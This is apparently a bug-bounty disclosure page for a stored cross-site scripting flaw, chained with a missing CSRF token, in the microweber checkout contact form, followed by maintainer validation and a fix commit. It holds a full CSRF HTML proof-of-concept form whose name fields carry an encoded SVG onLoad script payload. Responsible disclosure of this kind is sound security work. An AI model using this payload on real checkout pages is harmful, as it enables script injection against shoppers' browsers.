Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Jun 25th 2021


✍️ Description

Hello, I found CSRF + XSS on website so the impact of XSS could be presented.

There is no CSRF token or protection on: http://example.microweber.me/checkout/contact-information-save CSRF HTML PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.microweber.me/checkout/contact-information-save" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

and when we submit request XSS gets executed at the same time. Also personal information always stay there so it counts as Stored XSS

Video of me showing everything: https://youtu.be/H9XTNUzdtHg

💥 Impact

JS executed on victims browser while the person is in Checkout

Z-Old
a year ago

Admin


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back a year ago
microweber/microweber maintainer validated this vulnerability a year ago
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer confirmed that a fix has been merged on 846a63 a year ago
The fix bounty has been dropped
microweber/microweber maintainer
a year ago

Hello, thank for the report, this is a valid issue and has been fixed now in this commit https://github.com/microweber/microweber/commit/846a63ca216eee5a934f6f616d4a2fac4cc899cf

kirareys
a year ago

Researcher


Nice, thanks for attention :) Regards

to join this conversation